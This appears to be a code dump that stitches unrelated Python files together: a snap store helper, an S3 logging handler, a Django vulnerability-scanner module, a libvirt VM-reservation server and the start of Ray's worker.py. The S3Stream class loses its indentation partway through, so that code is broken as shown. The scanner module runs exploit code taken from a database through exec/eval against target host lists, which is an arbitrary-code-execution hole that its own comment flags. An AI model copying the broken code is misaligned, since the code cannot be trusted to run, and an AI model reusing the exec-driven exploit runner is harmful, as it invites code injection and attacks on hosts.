                                    t = Thread(target=self._fill_suggestion, args=(name, SuggestionPriority(int(sug[0])), res))
                                    t.start()
                                    threads.append(t)
                                    time.sleep(0.001)  # to avoid being blocked
                        else:
                            break
                for t in threads:
                    t.join()
                res.sort(key=lambda s: s.priority.value, reverse=True)
        return res

    def is_default_enabled(self) -> bool:
        return True

    def launch(self, pkg: SnapApplication):
        snap.run(pkg, self.context.logger)

    def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
        """Return the snap's screenshot URLs from the store API ([] on any failure)."""
        res = self.http_client.get_json('{}/search?q={}'.format(SNAP_API_URL, pkg.name))
        if res:
            if res.get('_embedded') and res['_embedded'].get('clickindex:package'):
                snap_data = res['_embedded']['clickindex:package'][0]
                if snap_data.get('screenshot_urls'):
                    return snap_data['screenshot_urls']
                else:
                    self.logger.warning("No 'screenshots_urls' defined for {}".format(pkg))
            else:
                self.logger.error('It seems the API is returning a different response: {}'.format(res))
        else:
            self.logger.warning('Could not retrieve data for {}'.format(pkg))
        return []
|
__init__.py | """
S3 Binding Module with logging handler and stream object
"""
__author__ = 'Omri Eival'
import atexit
import signal
import threading
import queue
import gzip
import codecs
import os
from logging import StreamHandler
from io import BufferedIOBase, BytesIO
from boto3 import Session
import datetime
from aws_logging_handlers.validation import is_non_empty_string, is_positive_int, empty_str_err, bad_integer_err, ValidationRule
from aws_logging_handlers.tasks import Task, task_worker, STOP_SIGNAL
# Tuning constants for the S3 log stream.
DEFAULT_CHUNK_SIZE = 5 * 1024 ** 2  # 5 MB per multipart upload chunk
DEFAULT_ROTATION_TIME_SECS = 12 * 60 * 60  # 12 hours between forced log file rotations
MAX_FILE_SIZE_BYTES = 100 * 1024 ** 2  # 100 MB size threshold for file rotation
MIN_WORKERS_NUM = 1  # minimum number of background worker threads
TZ_INFO = datetime.timezone(datetime.timedelta(hours=9))  # KOREA SEOUL TIME (UTC+9)
class StreamObject:
    """
    Class representation of the AWS s3 object along with all the needed metadata to stream to s3
    """

    def __init__(self, s3_resource, bucket_name, filename, buffer_queue, encryption):
        """
        :param s3_resource: boto3 S3 service resource
        :param bucket_name: name of the target bucket (plain string)
        :param filename: S3 key of the object being written
        :param buffer_queue: queue of pending upload tasks for this object
        :param encryption: extra kwargs (e.g. SSE settings) for initiate_multipart_upload
        """
        self.object = s3_resource.Object(bucket_name, filename)
        self.uploader = self.object.initiate_multipart_upload(**encryption)
        self.bucket = bucket_name
        try:
            # BUG FIX: self.bucket is a plain string, so the original `self.bucket.name`
            # always raised AttributeError and the size silently fell back to 0.
            # head_object() also returns a dict, so the byte count must be read
            # from its 'ContentLength' field.
            total_bytes = s3_resource.meta.client.head_object(Bucket=self.bucket,
                                                              Key=filename).get('ContentLength', 0)
        except Exception:
            # Object does not exist yet (fresh upload) or HEAD failed: start at 0.
            total_bytes = 0

        self.buffer = BytesIO()       # in-memory accumulation buffer for the current chunk
        self.chunk_count = 0          # number of multipart chunks rotated so far
        self.byte_count = total_bytes
        self.parts = []               # completed multipart upload parts
        self.tasks = buffer_queue

    def add_task(self, task):
        """
        Add a task to the tasks queue
        :param task: Task object
        :return:
        """
        self.tasks.put(task)

    def join_tasks(self):
        """
        Join all the tasks
        :return:
        """
        self.tasks.join()
class S3Stream(BufferedIOBase):
"""
stream interface used by the handler
"""
def __init__(self, bucket: str, key: str, *, chunk_size: int = DEFAULT_CHUNK_SIZE,
max_file_log_time: int = DEFAULT_ROTATION_TIME_SECS, max_file_size_bytes: int = MAX_FILE_SIZE_BYTES,
encoder: str = 'utf-8', workers: int = 1, compress: bool = False, log_root: str = '', encryption_options: dict = None, **boto_session_kwargs):
"""
:param bucket: name of the s3 bucket
:type bucket: str
:param key: s3 key path
:type key: str
:param chunk_size: size of multipart upload chunk size (default 5MB)
:type chunk_size: int
:param max_file_log_time: threshold period for a log period until file rotation (default 12 Hours)
:type max_file_log_time: int
:param max_file_size_bytes: threshold for file rotation by bytes (default 100MB)
:type max_file_size_bytes: int
:param encoder: the encoder to be used for log records (default 'utf-8')
:type encoder: str
:param workers: the number of background workers that rotate log records (default 1)
:type workers: int
:param compress: flag indication for archiving the content of a file
:type compress: bool
:param boto_session_kwargs: additional keyword arguments for the AWS Kinesis Resource
:type boto_session_kwargs: boto3 resource keyword arguments
"""
self._stream_buffer_queue = queue.Queue()
self._rotation_queue = queue.Queue()
self._session = Session()
self.s3 = self._session.resource('s3', **boto_session_kwargs)
self.start_time = datetime.datetime.now(tz=TZ_INFO)
self.key = key
self.chunk_size = chunk_size
self.max_file_log_time = max_file_log_time
self.max_file_size_bytes = max_file_size_bytes
self.current_file_name = os.path.join(log_root, "{}_{}".format(key, self.datetime_to_str(datetime.datetime.now(tz=TZ_INFO))))
self.log_root = log_root
self.encryption_options = encryption_options if encryption_options else {}
if compress:
self.current_file_name = "{}.gz".format(self.current_file_name)
else:
self.current_file_name = "{}.log".format(self.current_file_name)
self.encoder = encoder
self.bucket = bucket
self._current_object = self._get_stream_object(self.current_file_name)
self.workers = [threading.Thread(target=task_worker, args=(self._rotation_queue,), daemon=True).start() for _ in
range(int(max(workers, MIN_WORKERS_NUM) / 2) + 1)]
self._stream_bg_workers = [threading.Thread(target=task_worker, args=(self._stream_buffer_queue,), daemon=True).start() for _
in range(max(int(max(workers, MIN_WORKERS_NUM) / 2), 1))]
self._is_open = True
self.compress = compress
BufferedIOBase.__init__(self)
@property
def bucket(self):
    """The S3 bucket resource that log chunks are uploaded to."""
    return self._bucket

@bucket.setter
def bucket(self, val):
    """Validate that the bucket exists and is reachable, then bind it.

    :param val: name of the S3 bucket
    :raises ValueError: if the name is empty, the bucket does not exist,
        or the credentials lack permission to access it.
    """
    if not val:
        raise ValueError("Bucket name is invalid")
    try:
        # head_bucket is a cheap existence/permission probe.
        self.s3.meta.client.head_bucket(Bucket=val)
    except Exception as err:
        # Chain the original botocore error so the real cause stays visible
        # (the original raise discarded it).
        raise ValueError('Bucket %s does not exist, or insufficient permissions' % val) from err
    self._bucket = self.s3.Bucket(val)
@property
def key(self):
    """Base S3 key (path prefix) for the log objects, without edge slashes."""
    return self._key

@key.setter
def key(self, val):
    """Store the key after validating it and trimming surrounding '/'."""
    if val:
        self._key = val.strip('/')
    else:
        raise ValueError("Given key is invalid")
@property
def encoder(self):
    """Name of the codec used to encode log records before upload."""
    return self._encoder

@encoder.setter
def encoder(self, val):
    """Accept a codec name, verifying it is known to the codecs registry."""
    codecs.getencoder(val)  # raises LookupError for an unknown codec
    self._encoder = val
@staticmethod
def datetime_to_str(date):
    """Format *date* as 'YYYY-MM-DD_HH:MM:SS' for use in S3 object names."""
    stamp_format = '%Y-%m-%d_%H:%M:%S'
    return format(date, stamp_format)
@staticmethod
def datetime_timediff(date1, date2):
    """Return the absolute difference between two datetimes, in seconds.

    :param date1: first datetime (argument order does not matter)
    :param date2: second datetime
    :return: non-negative float number of seconds between the two instants
    """
    # abs() replaces the manual sign-flip of the original implementation.
    return abs((date1 - date2).total_seconds())
def get_filename(self):
    """
    returns a log file name
    :return: name of the log file in s3
    """
    suffix = "gz" if self.compress else "log"
    stamp = self.datetime_to_str(self.start_time)
    return os.path.join(self.log_root, "{}_{}.{}".format(self.key, stamp, suffix))
def _add_task(self, task):
    """Hand *task* to the background file-rotation workers."""
    self._rotation_queue.put(task)

def _join_tasks(self):
    """Block until every queued rotation task has been processed."""
    self._rotation_queue.join()
def _get_stream_object(self, filename):
    """Open a new StreamObject for *filename* in the configured bucket.

    :param filename: full S3 key of the new log object
    :raises RuntimeError: if the underlying S3 stream could not be opened.
    """
    try:
        return StreamObject(self.s3, self.bucket.name, filename, self._stream_buffer_queue, self.encryption_options)
    except Exception as err:
        # Chain the original failure instead of masking it entirely.
        raise RuntimeError('Failed to open new S3 stream object') from err
def _rotate_chunk(self, run_async=True):
    """Seal the current in-memory buffer and upload it as one multipart chunk.

    :param run_async: when True the upload is handed to the stream object's
        worker queue; when False it runs synchronously on the caller's thread
        (used by close() to guarantee the final chunk is flushed).
    """
    assert self._current_object, "Stream object not found"
    # S3 multipart upload part numbers are 1-based.
    part_num = self._current_object.chunk_count + 1
    part = self._current_object.uploader.Part(part_num)
    # Detach the full buffer and install a fresh one BEFORE uploading, so new
    # writes immediately land in the new buffer while this one is shipped.
    buffer = self._current_object.buffer
    self._current_object.buffer = BytesIO()
    buffer.seek(0)
    if run_async:
        self._current_object.add_task(Task(self._upload_part, self._current_object, part, part_num, buffer))
    else:
        self._upload_part(self._current_object, part, part_num, buffer)
    self._current_object.chunk_count += 1
@staticmethod
def _upload_part(s3_object, part, part_num, buffer):
    """Upload one chunk and record its ETag for the final multipart manifest."""
    response = part.upload(Body=buffer)
    s3_object.parts.append({'ETag': response['ETag'], 'PartNumber': part_num})
def _rotate_file(self):
    """Close the current log object and start a fresh, re-timestamped one.

    Buffered bytes are first flushed as a final chunk; completing the old
    multipart upload is queued on the background workers so logging is never
    blocked, then a new stream object with a new timestamped name is opened.
    """
    if self._current_object.buffer.tell() > 0:
        self._rotate_chunk()
    temp_object = self._current_object
    self._add_task(Task(self._close_stream, stream_object=temp_object))
    self.start_time = datetime.datetime.now(tz=TZ_INFO)
    new_filename = self.get_filename()
    # A leftover debug print of the new filename was removed here.
    self._current_object = self._get_stream_object(new_filename)
@staticmethod
def _close_stream(stream_object, callback=None, *args, **kwargs):
    """Finish (or abort) the multipart upload behind *stream_object*.

    Waits for the stream's pending upload tasks, then completes the multipart
    upload with the collected parts — or aborts it when no chunk was ever
    uploaded. An optional *callback* runs afterwards with *args*/*kwargs*.
    """
    stream_object.join_tasks()
    if stream_object.chunk_count == 0:
        # Nothing was uploaded; abandon the multipart upload entirely.
        stream_object.uploader.abort()
    else:
        ordered = sorted(stream_object.parts, key=lambda p: p['PartNumber'])
        stream_object.uploader.complete(MultipartUpload={'Parts': ordered})
    if callback and callable(callback):
        callback(*args, **kwargs)
def close(self, *args, **kwargs):
    """
    close the stream for writing, upload remaining log records in stream
    :param args:
    :param kwargs:
    :return:
    """
    # Flush any residual bytes synchronously so nothing is left behind.
    if self._current_object.buffer.tell() > 0:
        self._rotate_chunk(run_async=False)
    # Drain the stream's own upload queue, then the rotation queue, before
    # completing the final multipart upload.
    self._current_object.join_tasks()
    self._join_tasks()
    self._close_stream(self._current_object)
    # Stop the worker threads
    # NOTE(review): self.workers / self._stream_bg_workers hold None values
    # (Thread(...).start() returns None); only len() is used here so the
    # sentinel count still matches the number of started threads.
    for _ in range(len(self.workers)):
        self._rotation_queue.put(STOP_SIGNAL)
    for _ in range(len(self._stream_bg_workers)):
        self._stream_buffer_queue.put(STOP_SIGNAL)
    self._is_open = False
@property
def closed(self):
    # True once close() has completed; mirrors the io.IOBase `closed` API.
    return not self._is_open

@property
def writable(self, *args, **kwargs):
    # NOTE(review): io.IOBase defines writable() as a *method*, but this class
    # exposes it as a property — code calling stream.writable() would try to
    # call the bool itself. Confirm no caller invokes it as a method.
    return True
def tell(self, *args, **kwargs):
    """
    indication of current size of the stream before rotation
    :param args:
    :param kwargs:
    :return: size of the current stream
    """
    current = self._current_object
    return current.byte_count
def write(self, *args, **kwargs):
    """
    writes a log record to the stream
    :param args: args[0] is the log record (str) to write
    :param kwargs:
    :return: size of record that was written (bytes, post-compression)
    """
    record = args[0].encode(self.encoder)
    # A conditional expression replaces the fragile `cond and x or y` idiom,
    # which silently falls through to y whenever x is falsy.
    payload = gzip.compress(record) if self.compress else record
    self._current_object.buffer.write(payload)
    self._current_object.byte_count += len(payload)
    return len(payload)
def flush(self, *args, **kwargs):
    """
    flushes the current stream if it exceeds the threshold size
    :return:
    """
    obj = self._current_object
    if obj.buffer.tell() > self.chunk_size:
        self._rotate_chunk()
    # Rotate the whole file by size first, otherwise by elapsed log time;
    # if/elif preserves the original `or` short-circuit order.
    if self.max_file_size_bytes and obj.byte_count > self.max_file_size_bytes:
        self._rotate_file()
    elif self.max_file_log_time and int(self.datetime_timediff(datetime.datetime.now(tz=TZ_INFO), self.start_time)) > self.max_file_log_time:
        self._rotate_file()
class S3Handler(StreamHandler):
    """
    A Logging handler class that streams log records to S3 by chunks
    """

    def __init__(self, key: str, bucket: str, *, chunk_size: int = DEFAULT_CHUNK_SIZE,
                 time_rotation: int = DEFAULT_ROTATION_TIME_SECS, max_file_size_bytes: int = MAX_FILE_SIZE_BYTES,
                 encoder: str = 'utf-8',
                 workers: int = 1, compress: bool = False, log_root: str = '', **boto_session_kwargs):
        """
        :param key: The path of the S3 object
        :type key: str
        :param bucket: The id of the S3 bucket
        :type bucket: str
        :param chunk_size: size of a chunk in the multipart upload in bytes (default 5MB)
        :type chunk_size: int
        :param time_rotation: Interval in seconds to rotate the file by (default 12 hours)
        :type time_rotation: int
        :param max_file_size_bytes: maximum file size in bytes before rotation (default 100MB)
        :type max_file_size_bytes: int
        :param encoder: default utf-8
        :type encoder: str
        :param workers: the number of workers that a stream handler would run for
            file and chunk rotation tasks; only useful if emitting lots of records
        :type workers: int
        :param compress: indicating whether to save a compressed gz-suffixed file
        :type compress: bool
        """
        args_validation = (
            ValidationRule(time_rotation, is_positive_int, bad_integer_err('time_rotation')),
            ValidationRule(max_file_size_bytes, is_positive_int, bad_integer_err('max_file_size_bytes')),
            ValidationRule(encoder, is_non_empty_string, empty_str_err('encoder')),
            ValidationRule(workers, is_positive_int, bad_integer_err('workers')),
        )
        for rule in args_validation:
            assert rule.func(rule.arg), rule.message
        self.bucket = bucket
        self.stream = S3Stream(self.bucket, key, chunk_size=chunk_size, max_file_log_time=time_rotation,
                               max_file_size_bytes=max_file_size_bytes, encoder=encoder, workers=workers,
                               compress=compress, log_root=log_root, **boto_session_kwargs)
        # Make sure we gracefully clear the buffers and upload the missing parts before exiting
        self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
        self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
        self._sigquit_handler = signal.signal(signal.SIGQUIT, self._teardown)
        atexit.register(self.close)
        StreamHandler.__init__(self, self.stream)

    def _teardown(self, signum: int, frame):
        """Close the stream, then chain to the previously-installed handler.

        BUG FIX: signal.signal() may return signal.SIG_DFL, signal.SIG_IGN or
        None instead of a callable; the original code invoked the previous
        handler unconditionally and raised TypeError in those cases.
        """
        self.close()
        previous = {
            signal.SIGTERM: self._sigterm_handler,
            signal.SIGINT: self._sigint_handler,
            signal.SIGQUIT: self._sigquit_handler,
        }.get(signum)
        if callable(previous):
            previous(signum, frame)

    def close(self, *args, **kwargs):
        """
        Closes the stream
        """
        self.acquire()
        try:
            if self.stream:
                try:
                    self.flush()
                finally:
                    # Detach before closing so a re-entrant close() is a no-op.
                    stream = self.stream
                    self.stream = None
                    if hasattr(stream, "close"):
                        stream.close(*args, **kwargs)
        finally:
            self.release()
|
views.py | import sys
import threading
from Assets.models import AssetList
from ApolloScanner.dingtalk import dingtalker
from Configuration.models import Configuration
from VulnerableScan.models import ExploitRegister, VulnerableScanTasks, VulnerableScanResult
class MyLogger:
    """Accumulates debug messages onto an ExploitRegister row's debug_info.

    When *debug_flag* is False, log() is a no-op, so production scans never
    touch the database for logging.
    """

    def __init__(self, exp_id, debug_flag):
        # id of the ExploitRegister row that receives the messages
        self.exploit_id = exp_id
        # when False, log() returns immediately
        self.debug = debug_flag

    def log(self, message):
        """Append *message* to the exploit's stored debug_info column."""
        if not self.debug:
            return
        # Read-modify-write of the stored text; the stray debug prints that
        # surrounded this logic were removed.
        old_content = ExploitRegister.objects.filter(id=self.exploit_id).values_list("debug_info")[0][0]
        new_content = str(old_content) + str(message)
        ExploitRegister.objects.filter(id=self.exploit_id).update(debug_info=new_content)
class ResultStruts:
    """Small helper that writes one VulnerableScanResult row per finding."""

    def __init__(self, task_id, task_name):
        # Manager used to create result rows.
        self.cursor = VulnerableScanResult.objects
        # Template row; per-target fields are filled in by insert().
        self.result = {
            "task_id": task_id,
            "task_name": task_name,
            "ip_address": None,
            "port": None,
            "result_flag": False,
        }

    def insert(self, address, port, result):
        """Persist one scan result for *address*:*port*."""
        self.result.update(ip_address=address, port=int(port), result_flag=result)
        self.cursor.create(**self.result)
class VulnerableScanner:
    """Runs a registered exploit against a set of host:port targets.

    Task metadata, exploit source code and target lists are loaded from the
    Django models; each target is verified on its own thread, bounded by a
    configurable maximum thread count.
    """

    def __init__(self, task_id, debug=False):
        # In debug mode, task_id is an ExploitRegister id and only the single
        # target attached to the exploit is scanned; otherwise task_id is a
        # VulnerableScanTasks id whose exploit and target list are loaded.
        self.task_name = "debug"
        self.exploit_id = task_id
        if not debug:
            self.task_name = VulnerableScanTasks.objects.filter(id=task_id).values_list("name")[0][0]
            self.exploit_id = VulnerableScanTasks.objects.filter(id=task_id).values_list("exploit")[0][0]
        try:
            # Configuration row named "6" holds the global thread cap;
            # fall back to 10 when it is missing or unparseable.
            self.max_thread_count = int(Configuration.objects.filter(name="6").values_list("count")[0][0])
        except Exception as exception:
            print(exception)
            self.max_thread_count = 10
        # Number of verify() threads currently in flight.
        self.thread_size = 0
        self.debug = debug
        self.exploit_name = ExploitRegister.objects.filter(id=self.exploit_id).values_list("exploit_name")[0][0]
        self.exploit_code = ExploitRegister.objects.filter(id=self.exploit_id).values_list("code")[0][0]
        self.function_name = ExploitRegister.objects.filter(id=self.exploit_id).values_list("function_name")[0][0]
        self.target_id = None
        self.targets = []
        if not debug:
            # "a:1,b:2" style comma-separated host:port list; empty string
            # splits to [""] which is normalized to [].
            self.targets = str(VulnerableScanTasks.objects.filter(id=task_id).values_list("targets")[0][0]).split(",")
            self.targets = [] if self.targets == [""] else self.targets
            self.target_id = VulnerableScanTasks.objects.filter(id=task_id).values_list("target")[0][0]
        else:
            self.target_id = ExploitRegister.objects.filter(id=task_id).values_list("target")[0][0]
        if self.target_id is not None:
            # Resolve the referenced asset into an extra host:port target.
            address = AssetList.objects.filter(id=self.target_id).values_list("ip_address")[0][0]
            port = AssetList.objects.filter(id=self.target_id).values_list("port")[0][0]
            self.targets.append("%s:%s" % (address, str(port)))
        # Deduplicate targets (ordering is not preserved).
        self.targets = list(set(self.targets))
        self.cursor = ResultStruts(task_id, self.task_name)
        self.logger = MyLogger(self.exploit_id, self.debug)

    def function_execute_by_function_name(self, *args, **kwargs):
        # SECURITY: exec/eval of database-stored exploit code — anyone able to
        # write ExploitRegister.code gets arbitrary code execution here.
        exec(self.exploit_code)
        return eval(self.function_name)(*args, **kwargs)

    def verify(self, address, port):
        # Worker-thread body: run the exploit and persist/notify the result.
        result = self.function_execute_by_function_name(address, port, self.logger)
        if result:
            message = "漏洞: %s %s %s\n" % (str(self.exploit_name), address, str(port))
            if not self.debug:
                dingtalker.send(message)
        self.cursor.insert(address, port, result)
        # NOTE(review): unsynchronized decrement shared with run(); a lost
        # update is unlikely under the GIL but not guaranteed safe — confirm.
        self.thread_size -= 1

    def run(self):
        """Spawn one verify() thread per target, capped at max_thread_count."""
        # NOTE(review): the else/continue branch busy-waits at full CPU while
        # the cap is reached; a semaphore would be gentler.
        for target in self.targets:
            address, port = target.split(":")
            port = int(port)
            while True:
                if self.thread_size < self.max_thread_count:
                    self.thread_size += 1
                    thread = threading.Thread(target=self.verify, args=(address, int(port),))
                    thread.start()
                    break
                else:
                    continue
def start_scan(task_id):
    """Run a full (non-debug) vulnerability scan for the given task id."""
    VulnerableScanner(task_id).run()


def debug(task_id):
    """Run the scanner in debug mode, where *task_id* is an exploit id."""
    VulnerableScanner(task_id, debug=True).run()
domain_status.py | #! /usr/bin/env python3
import threading
import time
import socket
import libvirt
import sys
sys.path.append("./common")
import xml_parsing
import sockets
# Missed heartbeat cycles after which an occupied domain is force-released.
HEARTBEATS_LOSS = 3
# Seconds between heartbeat-aging passes of the background worker.
HEARTBEAT_CYCLE = 60
class HypervisorConnect():
    """Thin wrapper around a libvirt connection for domain lifecycle queries."""

    def __init__(self, hypervisorURI):
        self.__conn = self.__conn_hypervisor(hypervisorURI)
        # A failed connection is remembered as a critical error.
        self.__criticalError = self.__conn is None

    def __conn_hypervisor(self, driver):
        """Open a libvirt connection for *driver*; returns None on failure."""
        try:
            return libvirt.open(driver)
        except libvirt.libvirtError:
            print("Cannot connect to hypervisor", driver)
            return None

    def check_running(self, name):
        '''checks if gave domain is not down'''
        try:
            return self.__conn.lookupByName(name).ID() != -1
        except libvirt.libvirtError as e:
            print(e)
            return False

    def start_domain(self, name):
        """Boot *name* if it is down; True only when a boot was issued."""
        try:
            dom = self.__conn.lookupByName(name)
            if dom.ID() != -1:
                return False
            dom.create()
            return True
        except libvirt.libvirtError as e:
            print(e)
            return False

    def shutdown_domain(self, name):
        """Shut *name* down if it runs; True only when a shutdown was issued."""
        try:
            dom = self.__conn.lookupByName(name)
            if dom.ID() <= -1:
                return False
            dom.shutdown()
            return True
        except libvirt.libvirtError as e:
            print(e)
            return False

    def isCriticalError(self):
        """True when the constructor failed to reach the hypervisor."""
        return self.__criticalError

    def disconnect(self):
        """Close the libvirt connection, reporting but swallowing failures."""
        try:
            self.__conn.close()
        except libvirt.libvirtError as e:
            print(e.get_error_message())
        print("Hypervisor connection closed")
#Thread to increment and expropriate domain if necessary
def heartbeatIncrementWorker(domainsStatus, domainsLock):
    """Background loop that ages heartbeats and frees abandoned domains.

    Every HEARTBEAT_CYCLE seconds, each occupied domain's heartbeat counter is
    incremented; once a client has missed more than HEARTBEATS_LOSS cycles the
    domain is released via markNotUsing().
    """
    while True:
        time.sleep(HEARTBEAT_CYCLE)
        # `with` guarantees the lock is released even if an entry misbehaves;
        # the original acquire/release pair could leave it held on exception.
        with domainsLock:
            for dom in domainsStatus:
                if dom.status.occupied:
                    dom.status.heartbeatCounter += 1
                    if dom.status.heartbeatCounter > HEARTBEATS_LOSS:
                        markNotUsing(dom)
#Initializes connection with hypervisor, creates the heartbeat thread and the lock.
#Returns True on success, False otherwise.
def prepareToWork(domainsStatus, config) -> bool:
    global hyper
    global domainsLock
    hyper = HypervisorConnect(config['VIRTUALIZATION']['HYPERVISOR_URI'])
    if hyper.isCriticalError():
        return False
    domainsLock = threading.Lock()
    heartbeat = threading.Thread(
        target=heartbeatIncrementWorker,
        args=(domainsStatus, domainsLock),
        daemon=True,
    )
    heartbeat.start()
    return True
#closes connection with chosen hypervisor
def closeHypervisor() -> None:
    global hyper
    hyper.disconnect()
#Get status of domain. It's a reference to proper status of domain inside this software.
#It can be falsified when uses without caution.
#Returns Domain type on success, None otherwise.
def getDomain(domainList, name) -> xml_parsing.Domain:
    return next((dom for dom in domainList if dom.name == name), None)
#Marks domain as using by owner (owner's address)
#Returns True on success, False otherwise.
def markUsing(dom, owner) -> bool:
    status = dom.status
    if status.occupied:
        # Re-claiming by the current owner is accepted; anyone else is refused.
        return status.owner == owner
    status.owner = owner
    status.occupied = True
    status.heartbeatCounter = 0
    return True
#Marks domain as no longer used and clears its owner.
#Returns True on success, False otherwise.
def markNotUsing(dom) -> bool:
    if not dom.status.occupied:
        return False
    dom.status.owner = ''
    dom.status.occupied = False
    return True
def updateDomainsStatus(domainList) -> None:
    """Refresh every domain's isRunning flag from the hypervisor, under lock."""
    global domainsLock
    # `with` releases the lock even if a hypervisor query raises.
    with domainsLock:
        for dom in domainList:
            dom.status.isRunning = hyper.check_running(dom.name)
def handleHello(hello_path, sock):
    """Send the hello file's contents (minus the trailing newline) to the client."""
    with open(hello_path) as f:
        payload = f.read()[:-1]
    try:
        sockets.writeSocket(sock, (chr(sockets.HELLO) + payload).encode(encoding='utf-8'))
    except socket.timeout:
        pass
#Checks conditions and mark as occupied if all are right
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def connectHandle(data, domainList, sock, owner) -> str:
    """Claim a domain for *owner* and acknowledge over *sock*.

    Returns an error-message string on failure, None on success. The lock is
    managed with `with` so every exit path releases it; the original released
    it manually on each branch, which is easy to get wrong.
    """
    name = data.decode(encoding='utf-8')
    with domainsLock:
        dom = getDomain(domainList, name)
        if dom is None:
            return f'Domain {name} does not exist'
        if not dom.status.isRunning:
            return f'Domain {name} does not work'
        if not markUsing(dom, owner):
            return f'Domain {name} is already occupied'
        try:
            sockets.writeSocket(sock, (chr(sockets.CONNECT) + 'OK').encode(encoding='utf-8'))
        except socket.timeout:
            # Client vanished before the ACK arrived; roll back the claim.
            markNotUsing(dom)
    return None
#Checks conditions and mark as not occupied if all are right
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def disconnectHandle(data, domainList, sock, owner) -> str:
    name = data.decode(encoding='utf-8')
    with domainsLock:
        dom = getDomain(domainList, name)
        if dom is None:
            return f'Domain {name} does not exist'
        if not dom.status.isRunning:
            return f'Domain {name} does not work'
        if not markNotUsing(dom):
            return f'Domain {name} is not occupied'
    # The ACK is sent outside the lock, exactly as before.
    try:
        sockets.writeSocket(sock, (chr(sockets.DISCONNECT) + 'OK').encode(encoding='utf-8'))
    except socket.timeout:
        pass
    return None
#Zeros a heartbeatCounter for domains. It is used to check if client is still on the other side.
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def heartbeatHandle(data, domainList, sock, owner) -> str:
    name = data.decode(encoding='utf-8')
    with domainsLock:
        dom = getDomain(domainList, name)
        if dom is None:
            return f'Heartbeat - Domain {name} does not exist'
        if not dom.status.isRunning:
            return f'Heartbeat - Domain {name} does not work'
        if not dom.status.occupied:
            return f'Heartbeat - Domain {name} is not occupied'
        if dom.status.owner != owner:
            return f'Heartbeat - Domain {name} is not your property'
        dom.status.heartbeatCounter = 0
    try:
        sockets.writeSocket(sock, (chr(sockets.HEARTBEAT) + 'OK').encode(encoding='utf-8'))
    except socket.timeout:
        pass
    return None
def bootHandle(data, domainList, sock) -> str:
    """Boot a domain after cross-checking cached vs. hypervisor state.

    Returns an error-message string on failure, None otherwise.
    """
    name = data.decode(encoding='utf-8')
    with domainsLock:
        dom = getDomain(domainList, name)
        if dom is None:
            return f'Domain {name} does not exist.'
        inside = dom.status.isRunning
        outside = hyper.check_running(name)
    if outside and inside:
        return f'Domain {name} is up, cannot boot.'
    if outside != inside:
        # BUG FIX: these two messages were swapped relative to the parallel
        # logic in shutdownHandle — `outside` means the hypervisor reports
        # the domain as running.
        if outside:
            return f'Domain {name} is already running but status has wrong information. Please refresh.'
        return f'Domain {name} is down in hypervisor. If you really want to boot it up, refresh and try again, please.'
    if not hyper.start_domain(name):
        return f'Domain {name} cannot be started.'
    try:
        sockets.writeSocket(sock, (chr(sockets.BOOT) + 'OK').encode(encoding='utf-8'))
    except socket.timeout:
        # ACK failed: undo the boot so state stays consistent for the client.
        hyper.shutdown_domain(name)
    return None
def shutdownHandle(data, domainList, sock) -> str:
    """Shut a domain down after cross-checking cached vs. hypervisor state.

    Returns an error-message string on failure, None otherwise.
    """
    name = data.decode(encoding='utf-8')
    with domainsLock:
        dom = getDomain(domainList, name)
        if dom is None:
            return f'Domain {name} does not exist.'
        inside = dom.status.isRunning
        outside = hyper.check_running(name)
    if not outside and not inside:
        return f'Domain {name} is down, cannot shutdown.'
    if outside != inside:
        if outside:
            return f'Domain {name} is running in hypervisor. If you really want to shut it down, refresh and try again, please.'
        return f'Domain {name} is down in hypervisor. Please refresh.'
    if not hyper.shutdown_domain(name):
        # Typo fix: "shuted down" -> "shut down".
        return f'Domain {name} cannot be shut down.'
    # BUG FIX: the occupied flag was mutated without holding the lock.
    with domainsLock:
        dom.status.occupied = False
    try:
        sockets.writeSocket(sock, (chr(sockets.SHUTDOWN) + 'OK').encode(encoding='utf-8'))
    except socket.timeout:
        # ACK failed: bring the domain back up to match what the client saw.
        hyper.start_domain(name)
    return None
#Reloads data about virtual machines configured in XML file.
#Copies status of every still existing domain.
def changeToNewDomains(domainList, newList):
    """Swap in *newList* in place, preserving status of domains that survive.

    Uses a name->domain map instead of the original nested O(n^2) scan, and a
    `with` block so the lock cannot be left held.
    """
    global domainsLock
    with domainsLock:
        current = {d.name: d for d in domainList}
        for fresh in newList:
            old = current.get(fresh.name)
            if old is not None:
                # Same call direction as the original: the surviving (old)
                # domain's status object processes the fresh status.
                old.status.copyStatus(fresh.status)
        # In-place slice assignment keeps external references to domainList valid.
        domainList[:] = newList
|
worker.py | from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Dict, List, Iterator
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray.gcs_utils
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.services as services
import ray._private.runtime_env as runtime_env_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
from ray import profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
# Worker execution modes.
SCRIPT_MODE = 0          # driver run as a Python script / interactive shell
WORKER_MODE = 1          # regular worker process
LOCAL_MODE = 2           # driver executing tasks inline, for debugging
SPILL_WORKER_MODE = 3    # worker dedicated to spilling objects
RESTORE_WORKER_MODE = 4  # worker dedicated to restoring spilled objects
UTIL_WORKER_MODE = 5     # utility worker

# Redis key prefix under which error messages are stored.
ERROR_KEY_PREFIX = b"Error:"

